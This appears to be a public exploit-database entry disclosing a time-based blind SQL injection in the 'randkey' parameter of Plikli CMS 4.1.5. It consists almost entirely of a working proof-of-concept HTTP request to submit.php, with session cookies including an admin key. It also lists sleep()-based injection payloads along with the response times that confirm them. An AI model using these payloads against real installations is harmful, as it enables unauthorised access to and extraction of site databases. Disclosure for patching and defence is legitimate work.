Share
## https://sploitus.com/exploit?id=PACKETSTORM:189610
# Exploit Title: Plikli CMS 4.1.5 - 'randkey' SQL Injection
# Discovered by: Ahmet รmit BAYRAM
# Discovered Date: 05.03.2024
# Vendor Homepage: https://github.com/kkumar326/plikli
# Software Link:
https://github.com/kkumar326/plikli/archive/refs/heads/master.zip
# Demo: https://softaculous.com/demos/plikli_cms
# Tested Version: v4.1.5 (latest)
# Tested on: MacOS
### PoC Request ###
POST /pliklicms/submit.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/
20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/
avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://localhost
Connection: close
Referer: http://localhost/pliklicms/submit.php
Cookie: PHPSESSID=7f592f5d5ac82747bb6e682ca456a007; mnm_user=admin; mnm_key=
YWRtaW46MjJrTkdHVDVLbG9NWToxZjMxOGY0YTk5OTQwMzkyYjZhOTJlNjI4MWUyZmRiZg%3D%3D;
mnm_data=11fe3441ad4723841afd0beace6794ff
Upgrade-Insecure-Requests: 1
url=http%3A%2F%2Fgoogle.com&phase=1&randkey=1426389526396&id=c_1
### Vulnerable Parameter ###
randkey
### Payloads ###
1426389526396*if(now()=sysdate(),sleep(15),0) => 15.581
1426389526396*if(now()=sysdate(),sleep(6),0) => 6.527
1426389526396*if(now()=sysdate(),sleep(0),0) => 0.496
1426389526396*if(now()=sysdate(),sleep(15),0) => 15.488
1426389526396*if(now()=sysdate(),sleep(3),0) => 5.152
1426389526396*if(now()=sysdate(),sleep(0),0) => 0.661
1426389526396*if(now()=sysdate(),sleep(6),0) => 6.851